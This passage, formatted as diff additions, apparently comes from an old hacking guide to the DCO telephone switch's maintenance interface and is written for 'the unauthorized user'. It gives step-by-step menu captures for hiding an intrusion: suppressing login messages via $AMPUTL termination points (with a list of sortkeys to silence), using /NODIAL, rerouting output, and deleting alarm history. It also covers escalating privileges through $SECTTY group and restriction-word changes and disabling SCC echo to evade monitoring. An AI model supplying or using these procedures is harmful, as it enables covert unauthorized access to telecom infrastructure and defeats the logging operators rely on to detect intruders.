+aforementioned loopholes may be traversed in order to gain eventual 
+unfettered access. Also, an option does exist within the $SECTTY utility 
+(discussed forthwith) to activate an idle logout on a particular TTY, but 
+even this will not log a user out until an extended period of complete 
+inactivity has passed-it is still possible to connect to a terminal and 
+resume a session with this option activated, if one connects within this 
+said window of time. It is a trivial matter indeed to automatically and 
+repeatedly call a dialup in order to connect just after a user's activity 
+has ceased (indicating a departure from the terminal) and prior to the 
+auto-logout due to inactivity. Regardless, this is not a default setting, 
+and it is perhaps quite rare that one will encounter it. 
+
+
+Passive Observation-
+
+A rather simple means through which to learn various information pertaining
+to a DCO, that which may prove ultimately useful in the attainment of 
+access thereto, is merely that of passive observation of the information 
+messages that are displayed even prior to a login-i.e., monitoring the 
+dialup. This tendency to display status and other messages to anyone who 
+calls a dialup is quite unique to the DCO, although other switches such as 
+the EWSD exhibit this characteristic as well. Only messages ordinarily 
+broadcast to all ports (or the dial-in TTYs, at least) are displayed prior 
+to login, with the most common utility to which these messages pertain the 
+$SNCUTL (Synchronous Network Clock Utility). One explanation for this 
+idiosycrasy lies in the fact that, when one calls a DCO dialup, one is 
+automatically connected to the corresponding TTY-the login prompt/program 
+is simply another utility executed like any other (notably, the prompt 
+itself reveals this-the "LOG>" portion is of the similar format to all 
+other utility menu prompts-the first three letters of the utility + ">") 
+except that it is executed automatically upon connection if LOGOFF has been
+during the last session from that TTY, as opposed to a front-end program 
+that must be satisfied with proper credentials in order to connect to the 
+switch at all. In other words, LOGIN technically serves to restrict access
+to the remainder of the utilities and files on the switch through the MMI 
+rather than access to the MMI itself.
+
+
+Concealment of Presence
+-----------------------
+
+Although the DCO, as has been previously demonstrated, does not exhibit 
+PREVENTIVE security measures implemented with any degree of rigor, there 
+does exist a simple yet potentially effective means of detection of 
+potentially suspicious activity of those with access to the switch: 
+extensive logging. The majority of actions performed within the MMI are 
+relentlessly logged and broadcast, in messages of the following format:
+
+   DCO_CITYDATA 09-00-00 00:00:00 LOGIN  TT01 
+   MP .0354:TTY=TT1,USERNAME=MAINT LOGGED IN
+
+The date, time, program executed or file accessed (if applicable), port of 
+origination, sortkey, terminal, and message in ASCII text comprise, in that
+order from left to right, top to bottom, the message, the likes of which is
+output by default to the local terminal in addition to the console (TT00), 
+where the attentive administrator or technician will undoubtedly notice odd
+or unexpected activity, such as logins during strange hours, execution of 
+programs outside of the aforementioned sphere of tasks of a particular 
+account, activity on a particular port that may differ from that upon which
+the account/user logged in is ordinarily present, etc. The potential 
+negative impact of this upon the maintenance of one's (presumably 
+unauthorized) access should be evident; fortunately for the unauthorized 
+user, there exist a small variety of methods using a few key utilities to 
+mitigate the effect of these messages. 
+
+
+Defeating the Printing and Logging of Status Messages-
+
+Although it is not directly preventive and thus not a strictly classified 
+"security" measure, the constant deluge of status messages pertaining to 
+the execution and exit of utilities, etc., especially that of the LOGIN and
+LOGOFF utilities, presents a challenge to potential intruders as they are 
+by default broadcast to the console (TT00). These messages are identified 
+by "sortkeys" of the format XXX.0000 or XX.000, where XX(X) are two or 
+three letters signifying the classification/type of the message and the 
+zeroes the number of the exact message, which is either three or four 
+digits in length. Sortkey numbers of three digits in length may be typed 
+with a preceding zero (MP.0354 or MP.354) as well. A list of sortkey 
+prefixes (or "groups") follows, provided by $AMPUTL, which is discussed 
+elsewhere in this document:
+
+
+AMP> SORTKEY (SORTKEY=HELP) > 
+
+   VALID RESPONSES ARE GROUP TYPES FOLLOWED BY A GROUP NUMBER YYY.XXXX
+   YYY IS THE ALPHA QUALIFIER FOR THE GROUP TYPE
+   XXXX IS THE NUMERIC QUALIFIER FOR THE GROUP NUMBER
+   * , YYY.* CAN BE USED FOR ALARMS WITHIN A GROUP
+   'DONE' CAN BE USED TO TERMINATE THE PROMPT IF THE TASK IS IN A REPEAT 
+   MODE
+    
+   ACI.XXXX - ALARM COMMUNICATION INTERFACE
+   ADM.XXXX - ADMINISTRATIVE
+   ALT.XXXX - AUTOMATIC LINE TESTING
+   AMA.XXXX - AUTOMATED MESSAGE ACCOUNTING
+   CBC.XXXX - COMMUNICATION BUS CONTROLLER
+   CLC.XXXX - COMMUNICATION LINK CONTROLLER
+   CLK.XXXX - SNC, ANI, CLOCKS
+   CP.XXXX  - CALL PROCESSOR ALARMS
+   CPE.XXXX - CALL PROCESSOR ERROR ALARMS
+   CUS.XXXX - CUSTOMER GENERATED ALARMS
+   DLI.XXXX - DATA LINK INTERFACE
+   DS1.XXXX - DIGITAL T-1 SPAN MODULE ALARMS
+   ENV.XXXX - ENVIORNMENTAL ALARMS
+   FP.XXXX  - FEATURE PROCESSOR
+   LGC.XXXX - LINE GROUP CONTROLLER
+
+AMP> ADDITIONAL HELP (MORE=YES) > 
+
+   LIN.XXXX - LINE
+   LSC.XXXX - LINE SWITCH CONTROLLER
+   LTC.XXXX - LINE TEST CONTROLLER
+   MAH.XXXX - HOST MESSAGE ASSEMBLER
+   MAR.XXXX - REMOTE MESSAGE ASSEMBLER
+   MCC.XXXX - MCC ALARMS
+   MCI.XXXX - MAINTENANCE COMMUNICATION INTERFACE
+   MDC.XXXX - MAINTENANCE AND DIAGNOSTIC CONTROLLER 1
+   MD2.XXXX - MAINTENANCE AND DIAGNOSTIC CONTROLLER 2
+   MIC.XXXX - MESSAGE INTERFACE CONTROLLER
+   MP.XXXX  - MAINTENANCE AND ADMINISTRATION PROCESSOR
+   PWR.XXXX - POWER ALARMS
+   RLG.XXXX - REMOTE LINE GROUP
+   RNG.XXXX - RINGING
+   RPL.XXXX - REMOTE POLLED LAMA
+   SLC.XXXX - SLC-96
+   SS7.XXXX - SS7 ALARMS
+   SSC.XXXX - SIGNALLING SYSTEM CONTROLLER
+   SVC.XXXX - SERVICE CIRCUITS
+   TMP.XXXX = TMP ALARMS
+   TON.XXXX - TONE
+
+AMP> ADDITIONAL HELP (MORE=YES) > 
+
+   TPP.XXXX - TELEPHONY PRE-PROCESSOR
+   TRK.XXXX - TRUNK
+   TST.XXXX - TEST ALARMS
+
+
+The knowledge of the sortkey of a particular message is necessary to alter 
+or display data associated with that message within the following 
+utilities. Sortkeys may be identified in messages as seen above, or looked 
+up in the $AMPUTL utility. The messages are quite inherently extensive in 
+their reporting of the conditions in which the task reported upon was 
+executed; thus, they provide an extremely incriminating record of 
+unauthorized or "odd" activity on the switch. The author is personally 
+aware of at least one specific instance in which an individual's access to 
+a DCO was permanently terminated due to precisely this-the astute viewing 
+of messages printed to the console and elsewhere culminating in a 
+realization of unauthorized activity. It is therefore extremely important 
+for the unauthorized user to control when, how, and where these messages 
+are printed. There exist to this end a few effective methods by which to 
+thwart the tracking of one's activity on the switch using the utilities and
+access available as a segment of the MMI. It is recommended that all of 
+these be used in combination, in order to ensure maximum possible stealth.
+All are generally individually limited by the existence of the logging 
+measures defeated by the others; for instance, the use of the command 
+parameter /NODIAL is assistive in concealing one's presence, but the 
+storage and direction of information messages generated by 
+utilities/programs will require the use of $AMPUTL to protect most fully 
+the secrecy of usage. 
+
+The /NODIAL Parameter-
+
+Within the DCO MMI there are certain parameters that may be affixed to 
+command strings in order to handle the input and output of commands. 
+/NODIAL is one such parameter. It is an abbreviation for "NO DIALOGUE", 
+indicating that the execution of a command/menu option to which it is 
+affixed will not be itself reported to the defined termination points (the 
+ports/TTYs to which the message is sent/printed). Alternately conveyed, one
+through the use of /NODIAL avoids the printing of this sort of 
+"BEGIN/END DIALOGUE" message:
+
+
+DCO_CITYDATA 09-00-00 00:00:00 ADMIN TT01
+M  ADM.0000: ADMIN BEGIN DIALOGUE
+
+
+The begin/end dialogue messages may not be manipulated through $AMPUTL or 
+the other following utilities, since the sortkey ADM.0000 is not recognized
+by them as valid. ADM.0000 is a universal sortkey of sorts, used to signify
+all "begin dialogue" messages for all utilities/programs; it is thus 
+unassigned to any particular message. Likewise, sortkey ADM.0001 
+universally signifies all "end dialogue messages", and is unassigned 
+therefore as well. An attempt to alter or display a message with sortkey 
+ADM.0000 through $AMPUTL will prompt the following output:
+
+
+AMP> SORTKEY (SORTKEY=HELP) > ADM.0000
+   AMPUTL: SORTKEY IS UNASSIGNED  
+
+
+/NODIAL will offer one a degree of anonymity, then, but it does not prevent
+certain messages from being printed/displayed.
+ 
+Thwarting Information Messages With $AMPUTL- 
+
+A method exists to defeat the broadcast of messages using the $AMPUTL 
+command, the likes of which entails the use of the Alarm Message Processing
+Utility, a program accessible to all default groups. The AMPUTL menu system
+is as follows:
+
+
+$AMPUTL
+
+AMP> FUNCTION (FUNCTION=HELP) > 
+
+   CHANGE - CHANGE MESSAGE
+   DISPLAY - DISPLAY MESSAGE
+   EXIT
+
+
+The "DISPLAY" option will display the text of the message itself in 
+addition to other information pertaining to it, such as the termination 
+points, alarm level (if applicable), etc. Here is an example of the output 
+of "DISPLAY" for sortkey MP.0354, which identifies the message that a user 
+has logged into the switch:
+
+
+AMP> FUNCTION (FUNCTION=HELP) > DISPLAY
+
+AMP> SORTKEY (SORTKEY=HELP) > MP.0354
+
+   SORTKEY ENTRY MP .354
+   <TTY><DT1=USERNAME.A8>LOGGED IN
+   ALARM LEVEL NONE
+   INFORMATION MESSAGE 
+   NO ACI INTERFACE, TERMINAL LIMIT 0
+   TERMINATION POINTS ARE CONSOLE, TI:, 
+
+
+The first field obviously contains the sortkey used to identify the
+message, the second line/field the ASCII text of the message, the third 
+field the alarm level, (which is here "NONE" since the logging in and out 
+of users does not activate an alarm), the fourth the type of message, the 
+fifth the type of interface and terminal limit associated with the message,
+and the final field the termination points. Using the "CHANGE" option to 
+alter the properties of any particular message, a multitude of options may 
+be set, but most importantly the text and termination points of the message
+may be altered, presenting two possible venues to negate the revealing 
+effect of such messages. The termination point may be set thus to the 
+initiating terminal only, or the text of the message may be altered to suit
+the needs of an intruder. A list of attributes that may be altered through
+CHANGE follows:
+
+
+AMP> FUNCTION (FUNCTION=DISPLAY) > CHANGE
+
+AMP> FIELD (FIELD=HELP) > 
+
+   ADMINISTERABLE FIELDS ARE:
+    
+   EXIT - EXIT AMPUTL
+   ^ - QUIT CHANGE WITHOUT UPDATING
+   DONE - UPDATE DATABASE ON DISK
+   ACI - ALARM CONTROL INTERFACE
+   DELAY - DELAY ALARM SENDING
+   E2A - E2A ADDRESS
+   FEI - FAULT, ERROR, OR INFORMATION
+   GROUP - GROUPING NUMBER
+   LEVEL - ALARM LEVEL
+   LIMIT - TERMINAL LIMIT
+   MASKABLE - MASKABILITY FLAG
+   REPEAT - REPEAT FLAG
+   TERMPT - TERMINATION POINTS
+   TEXT - ASCII TEXT (OUTPUT MESSAGE)
+   RLS - RLS ALARM MESSAGE
+   BMP - BMP LED ASSIGNMENT
+
+To alter the termination points of the message, thereby instructing the 
+switch to print it only to certain specified terminals/TTYs, TERMPT is 
+entered at the FIELD prompt:
+
+
+AMP> FIELD (FIELD=HELP) > TERMPT
+   TERMPTS ARE CONSOLE, TI:, 
+
+
+The current termination points of this message were, as displayed, the 
+console and TI (initiating terminal). Numerous devices are then presented 
+which may be set as termination points for the message:
+
+
+AMP> DEVICE (DEVICE=HELP) > 
+
+   EXIT - EXIT FROM MASKING UTILITIES
+   ^ - BACKUP TO PREVIOUS PROMPT
+   DONE
+   ALL       - ALL PORTS
+   CONSOLE   - SYSTEM CONSOLE
+   NAC       - NAC TERMINAL
+   RLS       - RLS TERMINAL
+   AMATPS    - AMATPS MESSAGE FILE
+   TT00-TT31 - ANY PARTICULAR TTY
+   TI        - INITIATING TERMINAL
+
+
+For maximum stealth it would be advisable to set the termination points of 
+a message to the initiating terminal only, so that it will be displayed 
+only on the remote user's terminal, here TT01, when it is invoked by said 
+user:
+
+
+AMP> DEVICE (DEVICE=HELP) > CONSOLE
+
+AMP> STATUS (STATUS=HELP) > 
+
+   REMOVE
+   ADD
+   ^
+   EXIT
+
+AMP> STATUS (STATUS=HELP) > REMOVE
+
+AMP> DEVICE (DEVICE=DONE) > 
+
+AMP> FIELD (FIELD=HELP) > TERMPT
+   TERMPTS ARE TI:, 
+
+AMP> DEVICE (DEVICE=HELP) > DONE
+
+AMP> FIELD (FIELD=DONE) > 
+
+AMP> FUNCTION (FUNCTION=CHANGE) >
+
+
+Following this procedure, the termination point of the message MP.0354 is 
+set only to the initiating terminal; when a user logs in from TT01, the 
+information message announcing it will only be displayed on his/her 
+terminal and will not be printed to the console. It would be most useful 
+for an unauthorized user to set the termination points of the following few
+messages to TI only: MP.0354 (<TTY><DT1=USERNAME.A8>LOGGED IN), MP.0343 
+(<TTY>LOGGED OFF), MP.0676 (<TTY>EXCESSIVE LOGIN ATTEMPTS), MP.0002 (FILE 
+NOT FOUND ON DISK), MP.0461 (<TASK><FILE>INVALID NAME) and MP.0733 (INVALID
+TASK NAME) as these will commonly and naturally, as a matter of course, be 
+displayed through navigation into and around the switch and reveal 
+glaringly more than any other information or error messages an unauthorized
+presence.
+
+
+Monitoring Other TTYs and Redirecting Messages With $UTL-
+
+Occasionally during the course of switch use it may prove useful to monitor
+and manage tasks active on other terminals and to redirect I/O. The Utility
+Program ($UTL) may be employed to accomplish these and other functions 
+related to task management. Unlike other utilities discussed throughout, 
+the "function codes" of $UTL must be entered in a single string on the 
+command line:
+
+
+$UTL /NODIAL
+   DCO_CITYDATA
+   09-00-00 00:00:00 TUESDAY  UTILITY PROGRAM
+
+   UTL:INVALID FUNCTION CODE
+
+DCO>
+$UTL HELP /NODIAL
+   DCO_CITYDATA
+   09-00-00 00:00:00 TUESDAY  UTILITY PROGRAM
+   FUNC  DESCRIPTION              FORMAT EXAMPLES  
+   ====  =======================  ===============  
+   ACT   ACTIVE TASK LIST         ACT              
+             OR                   ACT ALL          
+             OR                   ACT TERM         
+             OR                   ACT TERM:TT06    
+             OR                   ACT ALL TERM     
+             OR                   ACT ALL TERM:TT06
+   ATB   AUTO TRUNK MAKE BUSY     ATB 122.:ON=50.  
+             OR                   ATB 37.:OFF      
+   BRO   BROADCAST MESSAGE        BRO TT02 HELLO   
+             OR                   BRO ALL REBOOT   
+   DMO   DISMOUNT DEVICE/FEATURE  DMO I1:          
+             OR                   DMO CNTRL        
+             OR                   DMO REQUIRED     
+             OR                   DMO LSXWRI 430   
+   MOU   MOUNT DEVICE/FEATURE     (SEE DMO EXAMPLES)
+   PRI   STATIC PRIORITY          PRI              
+             OR                   PRI STATUS       
+             OR                   PRI STATUS=100   
+   RED   REDIRECT TASK I/O        RED STATUS:TT01  
+   RPR   RUN PRIORITY             (SEE PRI EXAMPLES)
+   SCED  SCHEDULED TASKS          SCED             
+   TID   TERMINAL ID QUERY        TID              
+
+
+ACT will display a list of active tasks based upon the parameter entered. 
+As seen in the capture, to display tasks active on a particular terminal, 
+one would enter: 
+
+
+$UTL ACT TERM:TTXX
+
+
+ATB will busy out a specified trunk, BRO will broadcast a message to 
+another terminal, PRI sets priority of tasks, and DMO/MOU will mount or 
+dismount devices/features. Possibly the most useful function of UTL is RED,
+which may be entered to redirect the I/O of a task to another terminal as 
+seen in the format example in the capture. Reports generated with numerous
+other utilities might be printed elsewhere, etc. TID or "TERMINAL ID QUERY"
+will simply display the terminal that one is currently using, similar to 
+the "tty" command in DMERT/UNIX-RTR/5ESS UNIX on a Lucent 5ESS. 
+
+
+$UTL TID /NODIAL
+   DCO_CITYDATA
+   09-00-00 00:00:00 TUESDAY  UTILITY PROGRAM
+
+   TERMINAL ID => TT01
+
+
+Rerouting Messages with $RRTUTL-
+
+The $RRTUTL utility may be used to reroute messages destined for a 
+particular TTY and to display message routing to terminals. 
+
+
+RRT> FUNCTION  (FUNC=HELP) > 
+
+   VALID FUNCTIONS ARE:
+   LIST - LIST ALL LOCAL OR REMOTE TERMINAL ROUTING
+   DISPLAY - DISPLAY ONE LOCAL OR REMOTE TERMINAL ROUTING
+   CHANGE - CHANGE ONE LOCAL OR REMOTE TERMINAL ROUTING
+   EXIT - EXIT OUT OF THIS OVERLAY
+
+RRT> FUNCTION  (FUNC=HELP) > DISPLAY
+
+RRT> DATABASE  (DATABASE=HELP) > 
+
+   ENTER ROUTING DATABASE TYPE - LOCAL OR REMOTE
+   LOCAL - ROUTING OF MESSAGES VIA THE TERMINAL NUMBER OR BY SORTKEYS
+   REMOTE - ROUTING OF RNS/RLS-4000 MESSAGES VIA THE NODE NUMBER
+
+RRT> DATABASE  (DATABASE=HELP) > LOCAL
+
+RRT> TYPE OF TERMINAL  (TYPE=HELP) > 
+
+   ENTER TERMINAL #, OUTPUT DEVICE PSEUDO NAME OR SORT KEY
+   THAT IS TO HAVE ITS MESSAGES REROUTED
+
+RRT> TYPE OF TERMINAL  (TYPE=HELP) > TT01
+
+   RRTUTL: INVALID TYPE ENTERED - TT01, PLEASE RE-ENTER
+
+RRT> TYPE OF TERMINAL  (TYPE=HELP) > 01
+
+   PORT 1 HAS NO FAILOVER PORT
+   PORT 1 HAS NO REROUTING
+
+RRT> FUNCTION  (FUNC=DISPLAY) > 
+
+RRT> DATABASE  (DATABASE=LOCAL) > 
+
+RRT> TYPE OF TERMINAL  (TYPE=01) > 00
+
+   PORT 0 HAS FAILOVER PORT = 1
+   PORT 0 REROUTE TO PORT 1
+   PORT 0 REROUTE TO PORT 2
+
+RRT> FUNCTION  (FUNC=DISPLAY) > 
+
+RRT> DATABASE  (DATABASE=LOCAL) > 
+RRT> TYPE OF TERMINAL  (TYPE=00) > 02
+
+   PORT 2 HAS NO FAILOVER PORT
+   PORT 2 HAS NO REROUTING
+
+RRT> FUNCTION  (FUNC=DISPLAY) > 
+
+RRT> DATABASE  (DATABASE=LOCAL) > 
+RRT> TYPE OF TERMINAL  (TYPE=02) > 03
+
+   PORT 3 HAS NO FAILOVER PORT
+   PORT 3 HAS NO REROUTING
+
+RRT> FUNCTION  (FUNC=DISPLAY) > 
+
+RRT> DATABASE  (DATABASE=LOCAL) > 
+
+RRT> TYPE OF TERMINAL  (TYPE=03) > 04
+
+   PORT 4 HAS NO FAILOVER PORT
+   PORT 4 HAS NO REROUTING
+
+RRT> FUNCTION  (FUNC=DISPLAY) > EXIT /NODIAL
+
+
+As seen in the captures, messages destined to port 0 (the system master 
+console, TT00) will reroute to ports 1 and 2 (TT01 and TT02). 		
+
+Defeating Alarm Logging with $HSTUTL-
+
+As may be discovered through interactive use of the $AMPUTL utility, 
+information messages (such as notification of user login/off) and alarm 
+messages are distinctly categorized, although the broadcast method used for
+both is identical. With the use of any hacker/inexperienced user of the 
+switch lies the possibility that mistakes will be made and alarms 
+activated. Alarms, in certain situations, may reveal an unauthorized 
+presence on the switch, and as such must be for purposes of stealth 
+silenced. Such an occurrence is highly unlikely, however, and one exploring
+a DCO without authorization would be well advised to refrain from tampering
+with the alarms stored on the switch as they are often diagnostically 
+essential to switch maintenance; the deletion of crucial alarms not yet 
+reviewed by maintenance would be potentially perilous indeed. In any case, 
+alarm messages are logged in history files stored on the disk and 
+accessible through $HSTUTL. These history files are classified into 
+numbered "controllers" based upon the type of alarms with which they are 
+concerned, and the "data files" of the alarm messages themselves. 
+Operations on controllers provide a general overview of the alarm logs 
+without the need to view specific, dated messages. The menu system of 
+HSTUTL:
+
+
+$HSTUTL /NODIAL           
+
+HST> FUNCTION (FUNC=HELP) >                           
+
+   EXIT - EXITS HSTUTL                      
+   DISPLAY - DISPLAYS SINGLE HISTORY FILE                                         
+   LIST - LISTS ALL HISTORY FILES                                 
+   ADD - ADD A NEW HISTORY FILE ENTRY                                     
+   DELETE - DELETE A HISTORY FILE ENTRY                                       
+   CHANGE - CHANGE AN EXISTING HISTORY FILE ENTRY                                                 
+   BRIEF - GENERATE BRIEF HISTORY REPORT     
+
+
+With "DISPLAY", one may display either a controller or a data file; as per 
+usual, the "LIST" option will either list all controllers in output 
+complete with references and occurrences, or all data files associated with
+a particular controller.
+
+
+HST> FUNCTION (FUNC=HELP) > LIST
+
+HST> CONTROLLER OR LOGGING (TYPE=HELP) > 
+
+   EXIT - EXITS HSTUTL
+   CONTROLLER - HISTORICAL LOGGING CONTROLLER FILE
+   LOGGING - HISTORICAL LOGGING DATA FILE
+
+HST> CONTROLLER OR LOGGING (TYPE=HELP) > CONTROLLER
+
+   CONTROL NAME                                      REF  OCCUR. MATCH TYPE
+   ------- ---------------------------------------- ----- ------ ----------
+       0   SGD ALARMS                                109    10      NONE
+       3   SYNC ALARMS                                42    10      NONE
+       5   SWC ALARMS                                 74    10      NONE
+       6   TPP MISMATCH ALARMS                         1    10      NONE
+       7   STATE 1                                     1    10      NONE
+       8   STATE 2                                     1    10      NONE
+       9   STATE 4                                     1    10      NONE
+      10   CBC RESTARTED/STARTUP COMPLETE              2    10      NONE
+      11   LSC STARTUP COMPLETE                        1    10      NONE
+      12   FP RESTORE/STARTUP COMPLETE                 3    10      NONE
+      13   EXTENDED NON-SYNCHRONOUS OPERATION          1     1      NONE
+      14   MP STARTUP COMPLETE                         1    10      NONE
+
+HST> FUNCTION (FUNC=LIST) > 
+
+HST> CONTROLLER OR LOGGING (TYPE=CONTROLLER) > LOGGING
+
+HST> CONTROLLER NUMBER (CONT=HELP) > 0
+
+   CONTROL NAME                                      REF  OCCUR. MATCH TYPE
+   ------- ---------------------------------------- ----- ------ ----------
+       0   SGD ALARMS                                109    10      NONE
+
+   DCO_CITYDATA 09-00-00 00:00:00 SGDDRV TT00 
+   ** PWR.0001: BATTERY CHARGER FAILURE (SGD)
+
+   DCO_CITYDATA 09-00-00 00:00:00 SGDDRV TT00 
+   ** PWR.0001: BATTERY CHARGER FAILURE (SGD)
+
+   DCO_CITYDATA 09-00-00 00:00:00 SGDDRV TT00 
+   ** PWR.0001: BATTERY CHARGER FAILURE (SGD)
+
+   DCO_CITYDATA 09-00-00 00:00:00 SGDDRV TT00 
+   ** PWR.0001: BATTERY CHARGER FAILURE (SGD)
+
+   DCO_CITYDATA 09-00-00 00:00:00 SGDDRV TT00 
+      MP .0098:CMF=000,SIDE=X REFERENCE TIMING DEVIATION
+
+   DCO_CITYDATA 09-00-00 00:00:00 SWITCH TT01 
+      CLK.0009:CMF=000,SIDE=Y MASTER CLOCK SWITCHED TO ONLINE (SGD)
+
+With "CHANGE" one may alter a history file entry, and one may delete an 
+existing one with, naturally, "DELETE". 
+
+
+Escalation of Privileges
+------------------------
+
+In many cases it may be necessary for the unauthorized user to escalate the
+privileges of a particular account to which access has been attained, or to
+obtain access to the switch through another account entirely with alternate
+privileges. The purposes or motives behind such an attempt at privilege 
+escalation may be directed at expansion of one's ability to ability to 
+explore the switch, or perhaps to the end of stealth itself; as has been 
+demonstrated previously and heretofore, the specialization of accounts may 
+restrict one's access to utilities necessary for concealment. Both 
+superficial methods and those requiring one to delve more deeply into the 
+heart of the switch, as it were, exist naturally to this end.
+
+
+$SECTTY- 
+
+As an attempted security measure to counter the general problem of nearly 
+universally used defaults, it may be impossible to login with any account 
+other than SCAT from the dial-in ports; however, SCAT is authorized to 
+execute the command $SECTTY, which sets attributes such as terminal logins.
+It is therefore possible to individually add users to the list of those 
+authorized to log in from, as an example, TT01, or to create a new user 
+group, assign all of the desired users/accounts to it, and authorize said 
+group to log in from TT01. Restricted access to the file system as well as 
+to certain ports and utilities is one of the primary security measures 
+employed by the DCO-CS to limit user access based upon necessity.
+
+
+DCO>
+
+$SECTTY
+
+   DCO_CITYDATA 08-00-00 00:00:00 SECTTY TT01
+M  ADM.0000: SECTTY BEGIN DIALOGUE
+
+SEC> FUNCTION (FUNC=HELP) > 
+
+   THE FOLLOWING IS A LIST OF VALID FUNCTIONS :
+   SETCON         - SET SYSTEM CONSOLE
+   SETNAC         - SET NAC TERMINAL
+   ADD            - GROUP TO TERMINAL ACCESS
+   DELETE         - GROUP FROM TERMINAL ACCESS
+   DISPLAY        - EQUIPPED TERMINAL ACCESS RIGHTS
+   DEFINE         - NEW GROUP NAME
+   REMOVE         - EXISTING GROUP NAME
+   RESTRICTION    - SET UP FUNCTION LEVEL RESTRICTION FOR GROUP
+   LIST           - VALID GROUP NAMES
+   SETTYP         - SET TERMINAL TYPE
+   SETATT         - SET TERMINAL ATTRIBUTES
+   EXIT           - EXITS SECTTY
+
+SEC> FUNCTION (FUNC=HELP) > DISPLAY
+
+SEC> TTY NUMBER (TTY=HELP) > 
+
+   VALID TTY NUMBERS ARE:
+   0-31
+
+SEC> TTY NUMBER (TTY=HELP) > 00
+ 
+   SECTTY - TERMINAL ACCESS RIGHTS
+  
+   TTY       GROUP
+   -------------------
+    0        SCAT  
+
+
+SEC> FUNCTION (FUNC=DISPLAY) > 
+
+SEC> TTY NUMBER (TTY=00) > 01
+ 
+   SECTTY - TERMINAL ACCESS RIGHTS
+  
+   TTY       GROUP
+   -------------------
+    1        SCAT  
+
+SEC> TTY NUMBER (TTY=4) > 3 
+   SECTTY - TERMINAL ACCESS RIGHTS
+  
+   TTY       GROUP
+   -------------------
+    3        SCAT  
+
+SEC> FUNCTION (FUNC=DISPLAY) > LIST
+ 
+   SECTTY - VALID GROUP NAMES
+ 
+   GRP#  GRP NAME             RESTRICTION WORD 
+                     15 14 13 12 11 10 9 8 7 6 5 4 3 BXC RCO NAC 
+   -------------------------------------------------------------
+     1    ADMIN       0  0  0  0  0  0 0 0 0 0 0 0 0  1   0   0
+     2    TMRS        0  0  0  0  0  0 0 0 0 0 0 0 0  1   0   0
+     3    STATUS      0  0  0  0  0  0 0 0 0 0 0 0 0  1   0   0
+     4    MAINT       0  0  0  0  0  0 0 0 0 0 0 0 0  1   0   0
+     5    SECURE      0  0  0  0  0  0 0 0 0 0 0 0 0  1   0   0
+     6    NAC         0  0  0  0  0  0 0 0 0 0 0 0 0  1   0   1
+     7    ESPF        0  0  0  0  0  0 0 0 0 0 0 0 0  1   0   0
+     8    UNDEFINED
+     9    UNDEFINED
+    10    UNDEFINED
+    11    UNDEFINED
+    12    UNDEFINED
+    13    UNDEFINED
+    14    UNDEFINED
+    15    UNDEFINED
+    16    SCAT        0  0  0  0  0  0 0 0 0 0 0 0 0  0   0   0
+
+SEC> FUNCTION (FUNC=DISPLAY) > ADD
+
+SEC> GROUP NAME (NAME=HELP) > MAINT
+
+SEC> TTY NUMBER (TTY=00) > 01
+
+   SECTTY: GROUP ADDED FOR TTY 1
+
+SEC> FUNCTION (FUNC=ADD) > EXIT
+
+
+Terminal access rights/privileges are defined, as seen in the captures, 
+through the bit configuration of a "restriction word" for each group. Group
+access may also be manipulated through the modification of this word.
+
+
+SEC> FUNCTION (FUNC=HELP) > RESTRICTION
+
+SEC> GROUP NUMBER (GROUP=HELP) > 1
+   CURRENT RESTRICTION WORD:
+ 
+   GRP#  GRP NAME             RESTRICTION WORD 
+                     15 14 13 12 11 10 9 8 7 6 5 4 3 BXC RCO NAC 
+   -------------------------------------------------------------
+     1    ADMIN       0  0  0  0  0  0 0 0 0 0 0 0 0  1   0   0
+
+SEC> RESTRICTION WORD (VALUE=HELP) > 
+
+   0 - 65535  ANY BIT CONFIGURATION OF WORD
+
+
+SETATT allows a user to set numerous terminal options, one of which is 
+particularly significant as pertains to the concealment and hence 
+preservation of one's access.  
+
+
+SEC> FUNCTION (FUNC=HELP) > SETATT 
+
+SEC> TTY NUMBER (TTY=HELP) > 01
+
+SEC> OUTPUT NULLS (NULL=YES) > 
+
+SEC> OUTPUT PRIORITY (PRIORITY=NO) > 
+
+SEC> VT RESTRICTED (VTREST=NO) > 
+
+SEC> ECHO I/O TO SCC (SCC_ECHO=NO) > 
+
+SEC> INTER CHARACTER TIMING (INTCHAR TIME=YES) > 
+
+SEC> IDLE TERMINAL LOGOFF (IDLE TIME=NO) > 
+
+SEC> PAGINATED OUTPUT (PAGOUT =NO) > 
+
+SEC> SEND EOM TO TERMINAL (EOM=YES) > 
+
+SEC> TERMINAL LIMIT (LIMIT =0) >
+
+
+SCC_ECHO may be set to "YES" or "NO" depending upon the individual 
+configurations of different TTYs, but it should certainly be set to "NO" 
+during unauthorized usage-otherwise, input and output through the terminal 
+will be echoed to the SCC, and, due to the heavy monitoring thereof, one's 
+access will be likely detected quickly and terminated, at best, rather 
+quickly! If this was set for a particular TTY, though, an alteration of it 
+might be noticed soon thereafter and thought suspicious; it is therefore 
+advisable, if SCC_ECHO was set to "YES", to turn it off during one's 
+session of system use and set it back to its original state prior to 
+logging off. Then again, if this option was set for a single TTY, it might 
+be wise simply to login from another if possible, for at least a minimal 
+amount of preliminary I/O would be echoed to the SCC prior to deactivation 
+of that feature.
+
+
+Exploration of the File System with $FILSYS-
+
+The filesystem of the DCO-CS is accessible through the $FILSYS utility, 
+from which directories may be traversed, various forms of the disk 
+directory printed, access rights displayed and modified, etc. The 
+functions/options of FILSYS are as follows:
+
+
+FIL> ENTER FUNCTION (FUNC=HELP) > 
+
+   ACCESS      - CHANGE ACCESS RIGHTS
+   ATTRIB      - LIST ALL FILES W/ THE SPECIFIED ATTRIBUTE
+   BACKUP      - BACKUP DISK
+   BADBLK      - GET A BAD BLOCK REPORT
+   BLKEDT      - EDIT DISK BLOCKS
+   COMPARE     - COMPARE TWO FILES
+   COMPRESS    - COMPRESS A DISK
+   COPY        - COPY FILES
+   CP_COMPRESS - COMPRESS CP PROGRAM FILE
+   CWD         - CHANGE WORKING DIRECTORY
+   DB_COMPRESS - COMPRESS CP DATABASE FILE
+   DELETE      - DELETE FILE
+   DIR         - DISK DIRECTORY
+   DSKCMP      - DISK COMPARE
+   FDIR        - FULL DISK DIRECTORY
+   FORMAT      - FORMAT A DISK
+   FREE        - GET FREESPACE INFORMATION FOR A DISK
+   HDEDIT      - EDIT PROGRAM HEADER
+   MKDIR       - MAKE A SUB-DIRECTORY
+   MKFS        - MAKE A FILESYSTEM
+   MKTAPE      - MAKE A DCO TAPE FILESYSTEM
+
+FIL> ADDITIONAL HELP (MORE=YES) > 
+
+   MOVE        - MOVE A FILE FROM ONE DIRECTORY TO ANOTHER
+   RENAME      - RENAME FILES
